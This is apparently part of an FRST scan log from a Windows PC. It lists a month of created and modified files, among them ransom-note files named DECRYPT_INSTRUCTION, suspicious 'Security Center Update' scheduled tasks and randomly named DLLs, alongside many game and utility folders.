2014-10-18 19:06 - 2014-10-23 16:52 - 00003376 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1557230296-4363482-4078292831-1002
2014-10-18 19:03 - 2014-10-23 18:00 - 00000844 _____ () C:\Windows\Tasks\Security Center Update - 3324824421.job
2014-10-18 19:03 - 2014-10-18 19:03 - 00003820 _____ () C:\Windows\System32\Tasks\Security Center Update - 3324824421
2014-10-18 19:00 - 2014-10-18 23:58 - 00376141 _____ () C:\Windows\SysWOW64\rsslogs.20141018185920
2014-10-18 18:49 - 2014-10-18 18:49 - 00003160 _____ () C:\Windows\System32\Tasks\{1E3340DC-06B1-483A-AA5F-84CF6DD5E40A}
2014-10-18 18:47 - 2014-10-18 18:47 - 00192999 _____ () C:\Users\RaRWolf\Downloads\inform633_win32.zip
2014-10-18 18:36 - 2014-10-18 18:36 - 00253546 _____ () C:\Users\RaRWolf\Downloads\inform6.zip
2014-10-18 18:04 - 2014-10-18 18:05 - 08119386 _____ () C:\Users\RaRWolf\Downloads\I7_6L38_Windows.exe
2014-10-18 10:50 - 2014-10-23 18:00 - 00000844 _____ () C:\Windows\Tasks\Security Center Update - 3847798286.job
2014-10-18 10:50 - 2014-10-18 10:50 - 00003820 _____ () C:\Windows\System32\Tasks\Security Center Update - 3847798286
2014-10-17 19:54 - 2014-10-17 19:58 - 00005058 _____ () C:\Windows\SysWOW64\rsslogs.20141017195335
2014-10-17 17:32 - 2014-10-17 17:36 - 00006318 _____ () C:\Windows\SysWOW64\rsslogs.20141017173148
2014-10-17 17:27 - 2014-10-17 17:27 - 00000000 __SHD () C:\found.000
2014-10-17 07:36 - 2014-10-23 18:00 - 00000848 _____ () C:\Windows\Tasks\Security Center Update - 2903558157.job
2014-10-17 07:36 - 2014-10-17 07:36 - 00003824 _____ () C:\Windows\System32\Tasks\Security Center Update - 2903558157
2014-10-16 18:00 - 2014-10-16 18:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\by Decepticon
2014-10-16 15:41 - 2014-10-16 20:17 - 00349655 _____ () C:\Windows\SysWOW64\rsslogs.20141016154014
2014-10-16 15:35 - 2014-10-23 18:00 - 00000844 _____ () C:\Windows\Tasks\Security Center Update - 3029572363.job
2014-10-16 15:35 - 2014-10-16 15:35 - 00003820 _____ () C:\Windows\System32\Tasks\Security Center Update - 3029572363
2014-10-16 15:34 - 2014-10-23 18:00 - 00000932 _____ () C:\Windows\Tasks\Security Center Update - 258622643.job
2014-10-16 15:34 - 2014-10-16 15:34 - 00003908 _____ () C:\Windows\System32\Tasks\Security Center Update - 258622643
2014-10-16 15:25 - 2014-10-23 18:00 - 00000934 _____ () C:\Windows\Tasks\Security Center Update - 1765064875.job
2014-10-16 15:25 - 2014-10-21 18:36 - 00000272 _____ () C:\Users\RaRWolf\INSTALL_TOR.URL
2014-10-16 15:25 - 2014-10-16 15:25 - 00003910 _____ () C:\Windows\System32\Tasks\Security Center Update - 1765064875
2014-10-16 15:03 - 2014-10-16 15:03 - 00045442 _____ () C:\Windows\SysWOW64\rsslogs.20141016150239
2014-10-16 12:04 - 2014-10-16 12:04 - 00223097 _____ () C:\Windows\SysWOW64\rsslogs.20141016120406
2014-10-16 07:06 - 2014-10-16 12:04 - 00375584 _____ () C:\Windows\SysWOW64\rsslogs.20141016070501
2014-10-16 01:10 - 2014-10-16 01:10 - 00452714 _____ () C:\Windows\SysWOW64\rsslogs.20141016011028
2014-10-15 11:43 - 2014-10-16 01:09 - 01117862 _____ () C:\Windows\SysWOW64\rsslogs.20141015114230
2014-10-15 01:10 - 2014-10-15 11:42 - 00821065 _____ () C:\Windows\SysWOW64\rsslogs.20141015011027
2014-10-14 20:12 - 2014-10-15 01:10 - 00376136 _____ () C:\Windows\SysWOW64\rsslogs.20141014201145
2014-10-13 21:01 - 2014-10-13 21:02 - 07600226 _____ () C:\Users\RaRWolf\Downloads\ACBF_THEME.ZIP
2014-10-13 18:14 - 2014-10-13 18:14 - 00000000 ____D () C:\Windows\LastGood.Tmp
2014-10-12 22:17 - 2014-10-12 22:17 - 00002776 _____ () C:\Windows\System32\Tasks\CCleanerSkipUAC
2014-10-12 22:16 - 2014-10-12 22:17 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-12 22:16 - 2014-10-12 22:16 - 04965896 _____ (Piriform Ltd) C:\Users\RaRWolf\Downloads\ccsetup418 (1).exe
2014-10-12 22:16 - 2014-10-12 22:16 - 00000829 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-10-12 22:16 - 2014-10-12 22:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-10-12 05:55 - 2014-10-12 05:57 - 00000000 ____D () C:\reg value hkus
2014-10-12 00:25 - 2014-10-12 00:25 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Plarium
2014-10-12 00:24 - 2014-10-12 00:22 - 04378864 _____ (Piriform Ltd) C:\Users\RaRWolf\Downloads\cc_setup.exe
2014-10-11 23:31 - 2014-10-11 23:33 - 00800688 _____ ( ) C:\Users\RaRWolf\Downloads\CCleaner_Setup.exe
2014-10-11 23:31 - 2014-10-11 23:33 - 00800688 _____ ( ) C:\Users\RaRWolf\Downloads\CCleaner_Setup (1).exe
2014-10-11 11:46 - 2014-10-11 11:46 - 01121208 _____ () C:\Users\RaRWolf\Downloads\ProcessMonitor.zip
2014-10-10 14:05 - 2014-10-10 14:24 - 00000000 ____D () C:\Users\RaRWolf\Zomboid
2014-10-10 12:55 - 2014-10-10 12:55 - 00081408 _____ () C:\Users\RaRWolf\AppData\Roaming\qxigf.dll
2014-10-10 12:55 - 2014-10-10 12:55 - 00047104 _____ () C:\Users\RaRWolf\AppData\Roaming\dbrmh.dll
2014-10-10 12:55 - 2014-10-10 12:55 - 00004060 _____ () C:\Windows\System32\Tasks\{AE7C3D4A-D84F-FFE7-69BB-457B9C83DCAC}
2014-10-10 12:55 - 2014-10-10 12:55 - 00000000 _____ () C:\Users\RaRWolf\AppData\Roaming\nzhmwb.dll
2014-10-10 08:07 - 2014-10-10 08:07 - 00000000 ____D () C:\ProgramData\E1802384DB2718039F19F24F4594560F
2014-10-10 07:58 - 2014-10-10 07:58 - 00000000 ____D () C:\Users\RaRWolf\Documents\GameMaker
2014-10-10 07:57 - 2014-10-10 08:07 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\gamemaker_studio
2014-10-10 07:57 - 2014-10-10 07:57 - 00000000 ____D () C:\ProgramData\gamemaker_studio
2014-10-09 16:51 - 2014-10-23 18:31 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Skype
2014-10-08 21:59 - 2014-10-23 17:15 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\AIMP3
2014-10-08 21:03 - 2014-10-08 21:04 - 07718830 _____ () C:\Users\RaRWolf\Downloads\aimp_3.50.1224_beta_1.zip
2014-10-08 18:45 - 2014-10-08 18:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Stykz Help
2014-10-08 18:41 - 2014-10-08 18:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stykz
2014-10-08 18:40 - 2014-10-08 18:41 - 09890335 _____ () C:\Users\RaRWolf\Downloads\Install_Stykz (1).zip
2014-10-07 19:44 - 2014-10-07 19:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2014-10-07 19:43 - 2014-10-07 19:43 - 01677920 _____ (Skype Technologies S.A.) C:\Users\RaRWolf\Downloads\SkypeSetup.exe
2014-10-07 18:53 - 2014-10-14 20:08 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-07 18:52 - 2014-10-07 18:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-07 18:52 - 2014-10-07 18:52 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-07 18:52 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-07 18:52 - 2014-05-12 07:26 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-07 18:52 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-07 18:44 - 2014-10-07 18:45 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\RaRWolf\Downloads\mbam-setup-2.0.2.1012.exe
2014-10-07 02:32 - 2014-10-21 18:36 - 00008516 _____ () C:\Users\RaRWolf\DECRYPT_INSTRUCTION.HTML
2014-10-07 02:32 - 2014-10-21 18:36 - 00004198 _____ () C:\Users\RaRWolf\DECRYPT_INSTRUCTION.TXT
2014-10-07 02:32 - 2014-10-07 02:32 - 00000276 _____ () C:\Users\RaRWolf\DECRYPT_INSTRUCTION.URL
2014-10-06 22:50 - 2014-10-06 22:50 - 01887384 _____ ( ) C:\Users\RaRWolf\Downloads\Pivot_v4-1.exe
2014-10-06 22:38 - 2014-10-06 22:38 - 00027448 _____ () C:\Users\RaRWolf\Downloads\12197798227.zip
2014-10-06 22:29 - 2014-10-06 22:30 - 07085849 _____ () C:\Users\RaRWolf\Downloads\1208036521.zip
2014-10-06 22:29 - 2014-10-06 22:30 - 02304925 _____ () C:\Users\RaRWolf\Downloads\1208088047.zip
2014-10-06 22:17 - 2014-10-06 22:17 - 00008224 _____ () C:\Users\RaRWolf\Documents\DECRYPT_INSTRUCTION.HTML
2014-10-06 22:17 - 2014-10-06 22:17 - 00004156 _____ () C:\Users\RaRWolf\Documents\DECRYPT_INSTRUCTION.TXT
2014-10-06 22:17 - 2014-10-06 22:17 - 00000276 _____ () C:\Users\RaRWolf\Documents\DECRYPT_INSTRUCTION.URL
2014-10-06 22:16 - 2014-10-08 18:48 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\._LiveCode_
2014-10-06 22:15 - 2014-10-08 18:47 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Stykz
2014-10-06 22:15 - 2014-10-06 22:15 - 00000000 ____D () C:\Users\RaRWolf\Documents\Animations
2014-10-06 22:12 - 2014-10-06 22:14 - 09890335 _____ () C:\Users\RaRWolf\Downloads\Install_Stykz.zip
2014-10-06 21:48 - 2014-10-06 21:48 - 00008224 _____ () C:\Users\RaRWolf\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-10-06 21:48 - 2014-10-06 21:48 - 00008224 _____ () C:\Users\RaRWolf\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-06 21:48 - 2014-10-06 21:48 - 00004156 _____ () C:\Users\RaRWolf\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-10-06 21:48 - 2014-10-06 21:48 - 00004156 _____ () C:\Users\RaRWolf\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-06 21:48 - 2014-10-06 21:48 - 00000276 _____ () C:\Users\RaRWolf\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2014-10-06 21:48 - 2014-10-06 21:48 - 00000276 _____ () C:\Users\RaRWolf\AppData\DECRYPT_INSTRUCTION.URL
2014-10-06 20:34 - 2014-10-06 20:34 - 00008224 _____ () C:\Users\RaRWolf\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-06 20:34 - 2014-10-06 20:34 - 00004156 _____ () C:\Users\RaRWolf\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-06 20:34 - 2014-10-06 20:34 - 00000276 _____ () C:\Users\RaRWolf\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-10-06 19:43 - 2014-10-06 19:43 - 00008224 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.HTML
2014-10-06 19:43 - 2014-10-06 19:43 - 00008224 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.HTML
2014-10-06 19:43 - 2014-10-06 19:43 - 00004156 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.TXT
2014-10-06 19:43 - 2014-10-06 19:43 - 00004156 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.TXT
2014-10-06 19:43 - 2014-10-06 19:43 - 00000276 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.URL
2014-10-06 19:43 - 2014-10-06 19:43 - 00000276 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.URL
2014-10-06 19:42 - 2014-10-06 19:42 - 00008224 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-10-06 19:42 - 2014-10-06 19:42 - 00004156 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-10-06 19:42 - 2014-10-06 19:42 - 00000276 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL
2014-10-05 14:34 - 2014-10-23 18:30 - 00000000 ____D () C:\FRST
2014-10-05 14:33 - 2014-10-22 17:11 - 02112000 _____ (Farbar) C:\Users\RaRWolf\Downloads\FRST64.exe
2014-09-30 16:00 - 2014-10-22 19:38 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-27 14:30 - 2014-09-27 14:30 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skulltag
2014-09-27 14:30 - 2014-09-27 14:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skulltag
2014-09-24 22:41 - 2014-09-24 22:41 - 00001012 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Construct 2.lnk
2014-09-24 22:41 - 2014-09-24 22:41 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Construct2
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-23 18:33 - 2014-03-20 16:54 - 00000934 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-23 18:00 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\system32\sru
2014-10-23 17:58 - 2013-10-05 13:48 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Running with rifles
2014-10-23 17:47 - 2012-12-29 17:24 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\LogMeIn Hamachi
2014-10-23 17:46 - 2014-08-13 03:25 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\CrashDumps
2014-10-23 17:41 - 2012-12-26 16:30 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-23 17:35 - 2012-12-26 14:45 - 00003592 _____ () C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1557230296-4363482-4078292831-1002
2014-10-23 17:32 - 2012-12-26 16:37 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-10-23 16:44 - 2014-03-20 16:54 - 00000930 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-22 22:54 - 2013-05-31 19:17 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\uTorrent
2014-10-22 17:50 - 2013-08-07 15:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RPG MAKER VX Ace
2014-10-22 17:42 - 2013-02-21 20:31 - 00000000 ____D () C:\Games
2014-10-22 16:59 - 2013-05-08 20:26 - 00000000 ____D () C:\Users\RaRWolf\RaR
2014-10-21 18:54 - 2013-10-28 20:27 - 01132544 ___SH () C:\Users\RaRWolf\Downloads\Thumbs.db
2014-10-21 18:36 - 2012-12-26 14:37 - 00000000 ____D () C:\Users\RaRWolf
2014-10-21 08:28 - 2014-03-20 16:54 - 00003906 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-21 08:28 - 2014-03-20 16:54 - 00003670 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-20 02:01 - 2013-02-05 08:11 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Adobe
2014-10-19 21:16 - 2013-12-16 23:52 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-10-19 21:16 - 2012-07-26 03:22 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-19 21:14 - 2012-09-25 07:19 - 01253924 _____ () C:\Windows\WindowsUpdate.log
2014-10-19 11:53 - 2012-09-14 05:25 - 01579054 _____ () C:\Windows\DirectX.log
2014-10-19 11:37 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-18 18:58 - 2012-09-14 03:47 - 00073604 _____ () C:\Windows\PFRO.log
2014-10-18 18:31 - 2014-07-24 19:28 - 00000000 ____D () C:\Users\RaRWolf\Documents\Inform
2014-10-17 17:39 - 2012-07-26 01:26 - 00262144 ___SH () C:\Windows\system32\config\ELAM
2014-10-14 18:29 - 2013-12-26 14:45 - 00000000 ____D () C:\Users\RaRWolf\Documents\WB Games
2014-10-14 07:23 - 2013-05-26 21:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DAEMON Tools Pro
2014-10-14 07:23 - 2013-05-26 21:38 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DAEMON Tools Lite
2014-10-14 07:22 - 2014-03-24 15:31 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Media Player Classic
2014-10-14 06:53 - 2013-07-22 20:00 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\TS3Client
2014-10-14 05:42 - 2013-02-10 21:29 - 00000000 ____D () C:\Windows\Minidump
2014-10-13 18:14 - 2012-09-14 04:59 - 00000000 ____D () C:\Windows\SysWOW64\RTCOM
2014-10-13 18:14 - 2012-07-26 03:21 - 00030344 _____ () C:\Windows\setupact.log
2014-10-13 17:06 - 2012-09-14 04:58 - 00000000 ___HD () C:\Program Files (x86)\Temp
2014-10-13 17:06 - 2012-09-14 04:58 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-10-13 17:06 - 2012-09-14 04:58 - 00000000 ____D () C:\Program Files (x86)\Realtek
2014-10-11 11:27 - 2012-07-26 01:26 - 00262144 ___SH () C:\Windows\system32\config\BBI
2014-10-11 04:18 - 2014-07-14 11:33 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Arma 3 Launcher
2014-10-11 03:55 - 2013-06-28 13:33 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Arma 3
2014-10-10 02:16 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\AUInstallAgent
2014-10-09 16:50 - 2014-06-26 14:31 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\SkypeOld2
2014-10-08 17:56 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\Help
2014-10-07 19:44 - 2013-01-31 23:33 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-10-07 19:44 - 2013-01-31 23:32 - 00000000 ____D () C:\ProgramData\Skype
2014-10-07 19:26 - 2013-01-02 23:13 - 00000442 _____ () C:\Windows\system32\Drivers\etc\hosts.ics
2014-10-07 02:31 - 2013-01-13 21:07 - 00000000 ____D () C:\Users\RaRWolf\wurm
2014-10-06 23:01 - 2013-02-23 02:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pivot Animator
2014-10-06 22:27 - 2014-02-21 00:42 - 00000000 ____D () C:\Users\RaRWolf\Random
2014-10-06 22:17 - 2014-03-01 19:24 - 00000000 ____D () C:\Users\RaRWolf\Documents\Space
2014-10-06 22:17 - 2013-03-22 07:10 - 00000000 ____D () C:\Users\RaRWolf\My Games
2014-10-06 22:17 - 2013-01-18 17:50 - 00000000 ____D () C:\Users\RaRWolf\Documents\Wolfire
2014-10-06 22:16 - 2014-08-20 23:59 - 00000000 ____D () C:\Users\RaRWolf\Documents\RCT3
2014-10-06 22:16 - 2014-02-20 23:59 - 00000000 ____D () C:\Users\RaRWolf\Documents\Rainmeter
2014-10-06 22:16 - 2013-09-14 20:24 - 00000000 ____D () C:\Users\RaRWolf\Documents\SimCity 4
2014-10-06 22:16 - 2013-04-27 09:59 - 00000000 ____D () C:\Users\RaRWolf\Documents\Rockstar Games
2014-10-06 22:13 - 2014-08-11 15:24 - 00000000 ____D () C:\Users\RaRWolf\Documents\Oddworld
2014-10-06 22:13 - 2013-06-29 19:51 - 00000000 ____D () C:\Users\RaRWolf\Documents\Nexus Mod Manager
2014-10-06 22:11 - 2014-07-08 18:46 - 00000280 _____ () C:\Users\RaRWolf\Documents\New Text Document.txt
2014-10-06 22:11 - 2013-01-03 19:08 - 00000000 ____D () C:\Users\RaRWolf\Documents\My Games
2014-10-06 22:02 - 2014-04-27 20:36 - 00000000 ____D () C:\Users\RaRWolf\Documents\Klei
2014-10-06 22:02 - 2014-04-06 19:56 - 00000000 ____D () C:\Users\RaRWolf\Documents\Euro Truck Simulator 2
2014-10-06 22:02 - 2014-01-09 16:49 - 00000000 ____D () C:\Users\RaRWolf\Documents\KillHouseGames
2014-10-06 22:02 - 2013-02-17 19:12 - 00000000 ____D () C:\Users\RaRWolf\Documents\Mount&Blade With Fire and Sword
2014-10-06 22:01 - 2014-08-27 11:07 - 00000000 ____D () C:\Users\RaRWolf\Documents\Electrontic Arts
2014-10-06 22:01 - 2013-08-18 16:37 - 00000000 ____D () C:\Users\RaRWolf\Documents\Electronic Arts
2014-10-06 21:59 - 2013-08-14 20:00 - 00000000 ____D () C:\Users\RaRWolf\Documents\EA Games
2014-10-06 21:52 - 2014-07-19 04:13 - 00000000 ____D () C:\Users\RaRWolf\Documents\Dolphin Emulator
2014-10-06 21:52 - 2014-06-18 21:51 - 00000000 ____D () C:\Users\RaRWolf\Documents\BioWare
2014-10-06 21:52 - 2013-07-06 19:20 - 00000000 ____D () C:\Users\RaRWolf\Documents\Arma 3 Alpha
2014-10-06 21:51 - 2013-06-28 13:33 - 00000000 ____D () C:\Users\RaRWolf\Documents\Arma 3
2014-10-06 21:51 - 2013-02-01 08:14 - 00000000 ____D () C:\Users\RaRWolf\Documents\ArmA 2
2014-10-06 21:48 - 2013-06-12 15:50 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\WorldPainter
2014-10-06 21:48 - 2013-03-20 15:25 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Ubisoft
2014-10-06 21:47 - 2014-02-20 15:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\steamvr
2014-10-06 21:47 - 2013-10-23 14:45 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\SpaceEngineers
2014-10-06 21:47 - 2013-09-29 09:24 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Tropico 4
2014-10-06 21:47 - 2013-01-13 05:00 - 00726071 _____ () C:\Users\RaRWolf\AppData\Roaming\technic-launcher.jar.bak
2014-10-06 21:38 - 2013-01-31 23:33 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\SkypeOld
2014-10-06 21:36 - 2014-08-12 13:17 - 00036632 _____ () C:\Users\RaRWolf\AppData\Roaming\RZR_0180ce6c46479a4dad8b47328d2f.db
2014-10-06 21:36 - 2014-08-01 20:16 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\RealNetworks
2014-10-06 21:36 - 2014-08-01 20:15 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Real
2014-10-06 21:36 - 2013-11-14 16:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\six-updater
2014-10-06 21:36 - 2013-04-27 09:56 - 00000000 __RHD () C:\Users\RaRWolf\AppData\Roaming\SecuROM
2014-10-06 21:35 - 2014-01-13 20:40 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Nidhogg
2014-10-06 21:35 - 2013-08-14 16:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Origin
2014-10-06 21:35 - 2013-05-12 15:28 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\New Technology Studio
2014-10-06 21:35 - 2013-01-05 18:50 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Natural Selection 2
2014-10-06 21:22 - 2013-08-08 13:36 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Mount&Blade Warband
2014-10-06 21:22 - 2013-06-22 22:57 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\MOVAVI
2014-10-06 21:22 - 2013-04-26 15:39 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\MinMaxGames
2014-10-06 21:22 - 2012-12-26 16:28 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Mozilla
2014-10-06 21:20 - 2014-04-08 22:43 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\ECSoftware
2014-10-06 21:20 - 2013-08-13 22:45 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DVDVideoSoft
2014-10-06 21:20 - 2013-05-09 06:50 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Doublefine
2014-10-06 21:20 - 2013-04-26 21:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\LOVE
2014-10-06 21:17 - 2014-08-01 19:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Corel
2014-10-06 21:17 - 2014-07-09 15:57 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DarknessII
2014-10-06 21:17 - 2014-03-27 17:32 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\CreeperWorld3
2014-10-06 21:17 - 2013-05-26 18:01 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DAEMON Tools Ultra
2014-10-06 20:58 - 2014-08-20 23:59 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Atari
2014-10-06 20:58 - 2012-12-26 14:39 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Adobe
2014-10-06 20:57 - 2013-01-13 05:00 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\.techniclauncher
2014-10-06 20:50 - 2013-06-10 17:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\.technic
2014-10-06 20:37 - 2013-08-12 15:23 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\.minecraft
2014-10-06 20:34 - 2014-04-24 19:41 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\The Witcher
2014-10-06 20:34 - 2014-04-11 16:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\SniperV2
2014-10-06 20:34 - 2014-03-17 18:04 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Skype
2014-10-06 20:34 - 2014-03-05 22:53 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Uber Entertainment
2014-10-06 20:34 - 2013-06-29 12:34 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Skyrim
2014-10-06 20:34 - 2013-04-27 09:56 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Rockstar Games
2014-10-06 20:34 - 2013-03-05 22:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\WhatPulse
2014-10-06 20:34 - 2013-01-14 16:51 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Roblox
2014-10-06 20:32 - 2013-12-22 16:23 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Oblivion
2014-10-06 20:32 - 2013-08-22 20:31 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\PAYDAY 2
2014-10-06 20:32 - 2013-08-14 16:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Origin
2014-10-06 20:32 - 2013-05-25 18:38 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Play withSIX
2014-10-06 20:32 - 2013-05-12 15:28 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\New Technology Studio
2014-10-06 20:32 - 2013-01-12 13:02 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\PunkBuster
2014-10-06 20:14 - 2014-03-20 16:53 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Google
2014-10-06 20:14 - 2014-01-22 00:09 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\LucasArts
2014-10-06 20:14 - 2013-11-08 18:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Introversion
2014-10-06 20:14 - 2013-02-01 19:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\IsolatedStorage
2014-10-06 20:13 - 2014-08-27 11:08 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Electronic Arts
2014-10-06 20:13 - 2014-06-27 00:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Configuration Tool
2014-10-06 20:13 - 2014-01-29 14:03 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Blizzard
2014-10-06 20:13 - 2014-01-29 12:34 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Blizzard Entertainment
2014-10-06 20:13 - 2013-09-22 09:54 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\FalloutNV
2014-10-06 20:13 - 2013-09-09 18:38 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\CrashRpt
2014-10-06 20:13 - 2013-09-02 21:47 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\BeamNG
2014-10-06 20:13 - 2013-08-22 04:00 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\ESN Sonar
2014-10-06 20:13 - 2013-08-19 21:53 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\EA Games
2014-10-06 20:13 - 2013-08-13 21:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Dxtory Software
2014-10-06 20:13 - 2013-04-21 09:29 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Fallout3
